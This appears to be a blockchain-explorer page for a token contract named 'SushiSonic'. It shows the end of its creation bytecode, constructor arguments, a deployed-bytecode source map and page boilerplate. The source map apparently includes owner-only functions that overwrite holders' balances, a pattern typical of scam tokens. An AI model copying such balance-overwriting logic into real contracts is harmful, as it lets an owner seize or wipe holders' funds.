020919091019590945092505050565b5f60208284031215610bee575f5ffd5b610ab482610af0565b5f5f60408385031215610c08575f5ffd5b610c1183610af0565b9150610c1f60208401610af0565b90509250929050565b600181811c90821680610c3c57607f821691505b602082108103610c5a57634e487b7160e01b5f52602260045260245ffd5b50919050565b6020808252602c908201527f5375736869536f6e696332304f776e61626c653a2063616c6c6572206973206e60408201526b37ba103a34329037bbb732b960a11b606082015260800190565b634e487b7160e01b5f52603260045260245ffd5b634e487b7160e01b5f52601160045260245ffd5b8181038181111561033d5761033d610cc0565b8082018082111561033d5761033d610cc056fe5375736869536f6e6963696e746572666163653a2064656372656173656420616c6c6f77616e63652062656c6f77207a65726f5375736869536f6e6963696e746572666163653a207472616e7366657220796f7572736f6c6420657863656564732062616c616e63655375736869536f6e6963696e746572666163653a207472616e7366657220796f7572736f6c64206578636565647320616c6c6f77616e6365a2646970667358221220967cd3227b435fd237650896effc9e38e873832e8f22ae8fdec2772a19fc91bd64736f6c634300081c0033
Constructor Arguments (ABI-Encoded and is the last bytes of the Contract Creation Code above)
000000000000000000000000edb37ad563e2ef161b2a72169583f35799bde962
-----Decoded View---------------
Arg [0] : legosSwapRouterv3 (address): 0xedb37AD563E2Ef161b2a72169583f35799bdE962
-----Encoded View---------------
1 Constructor Arguments found :
Arg [0] : 000000000000000000000000edb37ad563e2ef161b2a72169583f35799bde962
Deployed Bytecode Sourcemap
11465:7711:0:-:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;12800:94;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;14813:177;;;;;;:::i;:::-;;:::i;:::-;;;1085:14:1;;1078:22;1060:41;;1048:2;1033:18;14813:177:0;920:187:1;12974:102:0;13056:12;;12974:102;;;1258:25:1;;;1246:2;1231:18;12974:102:0;1112:177:1;15487:342:0;;;;;;:::i;:::-;;:::i;12476:94::-;12553:9;;12476:94;;12553:9;;;;1815:36:1;;1803:2;1788:18;12476:94:0;1673:184:1;16254:234:0;;;;;;:::i;:::-;;:::i;13570:240::-;;;;;;:::i;:::-;;:::i;:::-;;13154:120;;;;;;:::i;:::-;-1:-1:-1;;;;;13249:17:0;13222:7;13249:17;;;:8;:17;;;;;;;13154:120;5848:148;;;:::i;14213:207::-;;;;;;:::i;:::-;;:::i;12313:94::-;12365:7;5258:6;-1:-1:-1;;;;;5258:6:0;12313:94;;;-1:-1:-1;;;;;2832:32:1;;;2814:51;;2802:2;2787:18;12313:94:0;2668:203:1;5185:87:0;5231:7;5258:6;-1:-1:-1;;;;;5258:6:0;5185:87;;12637:98;;;:::i;17006:287::-;;;;;;:::i;:::-;;:::i;14032:175::-;;;;;;:::i;:::-;;:::i;14492:158::-;;;;;;:::i;:::-;-1:-1:-1;;;;;14607:21:0;;;14580:7;14607:21;;;:14;:21;;;;;;;;:35;;;;;;;;;;;;;14492:158;6151:256;;;;;;:::i;:::-;;:::i;12800:94::-;12848:13;12881:5;12874:12;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;12800:94;:::o;14813:177::-;14897:4;14914:46;3817:10;14937:12;14951:8;14914;:46::i;:::-;-1:-1:-1;14978:4:0;14813:177;;;;;:::o;15487:342::-;15590:4;15607:39;15617:6;15625:10;15637:8;15607:9;:39::i;:::-;15657:142;15666:6;3817:10;15688:110;15729:8;15688:110;;;;;;;;;;;;;;;;;-1:-1:-1;;;;;15688:22:0;;;;;;:14;:22;;;;;;;;3817:10;15688:36;;;;;;;;;;:40;:110::i;:::-;15657:8;:142::i;:::-;-1:-1:-1;15817:4:0;15487:342;;;;;:::o;16254:234::-;3817:10;16343:4;16397:28;;;:14;:28;;;;;;;;-1:-1:-1;;;;;16397:42:0;;;;;;;;;;16343:4;;16360:98;;16383:12;;16397:60;;16444:12;16397:46;:60::i;13570:240::-;13321:11;;-1:-1:-1;;;;;13321:11:0;3817:10;13321:27;13313:84;;;;-1:-1:-1;;;13313:84:0;;;;;;;:::i;:::-;;;;;;;;;13651:9:::1;13646:161;13666:22:::0;;::::1;13646:161;;;13733:1;13706:8:::0;:24:::1;13715:11;;13727:1;13715:14;;;;;;;:::i;:::-;;;;;;;;;;;;;;:::i;:::-;-1:-1:-1::0;;;;;13706:24:0::1;::::0;;::::1;::::0;::::1;::::0;;;;;;-1:-1:-1;13706:24:0;;;:28;;;;13769:11;;13781:1;13769:14;;::::1;;;;;:::i;:::-;;;;;;;;;;;;;;:::i;:::-;-1:-1:-1::0;;;;;13760:39:0::1;;13797:1;13760:39;;;;1258:25:1::0;;1246:2;1231:18;;1112:177;13760:39:0::1;;;;;;;;13690:3;;13646:161;;;;13570:240:::0;;:::o;5848:148::-;5231:7;5258:6;-1:-1:-1;;;;;5258:6:0;3817:10;5405:23;5397:80;;;;-1:-1:-1;;;5397:80:0;;;;;;;:::i;:::-;5955:1:::1;5939:6:::0;;5918:40:::1;::::0;-1:-1:-1;;;;;5939:6:0;;::::1;::::0;5918:40:::1;::::0;5955:1;;5918:40:::1;5986:1;5969:19:::0;;-1:-1:-1;;;;;;5969:19:0::1;::::0;;5848:148::o;14213:207::-;13321:11;;-1:-1:-1;;;;;13321:11:0;3817:10;13321:27;13313:84;;;;-1:-1:-1;;;13313:84:0;;;;;;;:::i;:::-;-1:-1:-1;;;;;14283:21:0;::::1;;::::0;;;:8:::1;:21;::::0;;;;;;;14307:22:::1;14283:46:::0;;;;14355:57;;1258:25:1;;;14283:21:0;;;14355:57:::1;::::0;1231:18:1;14355:57:0::1;;;;;;;14213:207:::0;:::o;12637:98::-;12687:13;12720:7;12713:14;;;;;:::i;17006:287::-;17094:4;17111:152;3817:10;17134:12;17148:114;17195:11;17148:114;;;;;;;;;;;;;;;;;3817:10;17148:28;;;;:14;:28;;;;;;;;-1:-1:-1;;;;;17148:42:0;;;;;;;;;;;;:46;:114::i;14032:175::-;14115:4;14132:45;3817:10;14156;14168:8;14132:9;:45::i;6151:256::-;5231:7;5258:6;-1:-1:-1;;;;;5258:6:0;3817:10;5405:23;5397:80;;;;-1:-1:-1;;;5397:80:0;;;;;;;:::i;:::-;-1:-1:-1;;;;;6240:22:0;::::1;6232:85;;;::::0;-1:-1:-1;;;6232:85:0;;4683:2:1;6232:85:0::1;::::0;::::1;4665:21:1::0;4722:2;4702:18;;;4695:30;4761:34;4741:18;;;4734:62;-1:-1:-1;;;4812:18:1;;;4805:48;4870:19;;6232:85:0::1;4481:414:1::0;6232:85:0::1;6354:6;::::0;;6333:38:::1;::::0;-1:-1:-1;;;;;6333:38:0;;::::1;::::0;6354:6;::::1;::::0;6333:38:::1;::::0;::::1;6382:6;:17:::0;;-1:-1:-1;;;;;;6382:17:0::1;-1:-1:-1::0;;;;;6382:17:0;;;::::1;::::0;;;::::1;::::0;;6151:256::o;18764:403::-;-1:-1:-1;;;;;18865:19:0;;18857:82;;;;-1:-1:-1;;;18857:82:0;;5102:2:1;18857:82:0;;;5084:21:1;5141:2;5121:18;;;5114:30;5180:34;5160:18;;;5153:62;-1:-1:-1;;;5231:18:1;;;5224:48;5289:19;;18857:82:0;4900:414:1;18857:82:0;-1:-1:-1;;;;;18958:26:0;;18950:87;;;;-1:-1:-1;;;18950:87:0;;5521:2:1;18950:87:0;;;5503:21:1;5560:2;5540:18;;;5533:30;5599:34;5579:18;;;5572:62;-1:-1:-1;;;5650:18:1;;;5643:46;5706:19;;18950:87:0;5319:412:1;18950:87:0;-1:-1:-1;;;;;19058:21:0;;;;;;;:14;:21;;;;;;;;:35;;;;;;;;;;;;;:46;;;19120:39;;1258:25:1;;;19120:39:0;;1231:18:1;19120:39:0;;;;;;;;18764:403;;;:::o;17780:540::-;-1:-1:-1;;;;;17881:20:0;;17873:84;;;;-1:-1:-1;;;17873:84:0;;5938:2:1;17873:84:0;;;5920:21:1;5977:2;5957:18;;;5950:30;6016:34;5996:18;;;5989:62;-1:-1:-1;;;6067:18:1;;;6060:49;6126:19;;17873:84:0;5736:415:1;17873:84:0;-1:-1:-1;;;;;17976:24:0;;17968:86;;;;-1:-1:-1;;;17968:86:0;;6358:2:1;17968:86:0;;;6340:21:1;6397:2;6377:18;;;6370:30;6436:34;6416:18;;;6409:62;-1:-1:-1;;;6487:18:1;;;6480:47;6544:19;;17968:86:0;6156:413:1;17968:86:0;18102:88;18123:8;18102:88;;;;;;;;;;;;;;;;;-1:-1:-1;;;;;18102:16:0;;;;;;:8;:16;;;;;;;:88;:20;:88::i;:::-;-1:-1:-1;;;;;18083:16:0;;;;;;;:8;:16;;;;;;:107;;;;18224:20;;;;;;;:34;;18249:8;18224:24;:34::i;:::-;-1:-1:-1;;;;;18201:20:0;;;;;;;:8;:20;;;;;;;:57;;;;18274:38;;;;;;;;;;18303:8;1258:25:1;;1246:2;1231:18;;1112:177;8077:178:0;8163:7;8195:12;8187:6;;;;8179:29;;;;-1:-1:-1;;;8179:29:0;;;;;;;;:::i;:::-;-1:-1:-1;8215:9:0;8227:5;8231:1;8227;:5;:::i;:::-;8215:17;8077:178;-1:-1:-1;;;;;8077:178:0:o;7238:173::-;7296:7;;7324:5;7328:1;7324;:5;:::i;:::-;7312:17;;7349:1;7344;:6;;7336:52;;;;-1:-1:-1;;;7336:52:0;;7171:2:1;7336:52:0;;;7153:21:1;7210:2;7190:18;;;7183:30;7249:34;7229:18;;;7222:62;-1:-1:-1;;;7300:18:1;;;7293:31;7341:19;;7336:52:0;6969:397:1;7336:52:0;7404:1;7238:173;-1:-1:-1;;;7238:173:0:o;14:418:1:-;163:2;152:9;145:21;126:4;195:6;189:13;238:6;233:2;222:9;218:18;211:34;297:6;292:2;284:6;280:15;275:2;264:9;260:18;254:50;353:1;348:2;339:6;328:9;324:22;320:31;313:42;423:2;416;412:7;407:2;399:6;395:15;391:29;380:9;376:45;372:54;364:62;;;14:418;;;;:::o;437:173::-;505:20;;-1:-1:-1;;;;;554:31:1;;544:42;;534:70;;600:1;597;590:12;534:70;437:173;;;:::o;615:300::-;683:6;691;744:2;732:9;723:7;719:23;715:32;712:52;;;760:1;757;750:12;712:52;783:29;802:9;783:29;:::i;:::-;773:39;881:2;866:18;;;;853:32;;-1:-1:-1;;;615:300:1:o;1294:374::-;1371:6;1379;1387;1440:2;1428:9;1419:7;1415:23;1411:32;1408:52;;;1456:1;1453;1446:12;1408:52;1479:29;1498:9;1479:29;:::i;:::-;1469:39;;1527:38;1561:2;1550:9;1546:18;1527:38;:::i;:::-;1294:374;;1517:48;;-1:-1:-1;;;1634:2:1;1619:18;;;;1606:32;;1294:374::o;1862:610::-;1948:6;1956;2009:2;1997:9;1988:7;1984:23;1980:32;1977:52;;;2025:1;2022;2015:12;1977:52;2065:9;2052:23;2098:18;2090:6;2087:30;2084:50;;;2130:1;2127;2120:12;2084:50;2153:22;;2206:4;2198:13;;2194:27;-1:-1:-1;2184:55:1;;2235:1;2232;2225:12;2184:55;2275:2;2262:16;2301:18;2293:6;2290:30;2287:50;;;2333:1;2330;2323:12;2287:50;2386:7;2381:2;2371:6;2368:1;2364:14;2360:2;2356:23;2352:32;2349:45;2346:65;;;2407:1;2404;2397:12;2346:65;2438:2;2430:11;;;;;2460:6;;-1:-1:-1;1862:610:1;-1:-1:-1;;;1862:610:1:o;2477:186::-;2536:6;2589:2;2577:9;2568:7;2564:23;2560:32;2557:52;;;2605:1;2602;2595:12;2557:52;2628:29;2647:9;2628:29;:::i;2876:260::-;2944:6;2952;3005:2;2993:9;2984:7;2980:23;2976:32;2973:52;;;3021:1;3018;3011:12;2973:52;3044:29;3063:9;3044:29;:::i;:::-;3034:39;;3092:38;3126:2;3115:9;3111:18;3092:38;:::i;:::-;3082:48;;2876:260;;;;;:::o;3141:380::-;3220:1;3216:12;;;;3263;;;3284:61;;3338:4;3330:6;3326:17;3316:27;;3284:61;3391:2;3383:6;3380:14;3360:18;3357:38;3354:161;;3437:10;3432:3;3428:20;3425:1;3418:31;3472:4;3469:1;3462:15;3500:4;3497:1;3490:15;3354:161;;3141:380;;;:::o;3526:408::-;3728:2;3710:21;;;3767:2;3747:18;;;3740:30;3806:34;3801:2;3786:18;;3779:62;-1:-1:-1;;;3872:2:1;3857:18;;3850:42;3924:3;3909:19;;3526:408::o;3939:127::-;4000:10;3995:3;3991:20;3988:1;3981:31;4031:4;4028:1;4021:15;4055:4;4052:1;4045:15;6574:127;6635:10;6630:3;6626:20;6623:1;6616:31;6666:4;6663:1;6656:15;6690:4;6687:1;6680:15;6706:128;6773:9;;;6794:11;;;6791:37;;;6808:18;;:::i;6839:125::-;6904:9;;;6925:10;;;6922:36;;;6938:18;;:::i
Swarm Source
ipfs://967cd3227b435fd237650896effc9e38e873832e8f22ae8fdec2772a19fc91bd
[ Download: CSV Export ]
[ Download: CSV Export ]
A token is a representation of an on-chain or off-chain asset. The token page shows information such as price, total supply, holders, transfers and social links. Learn more about this page in our Knowledge Base.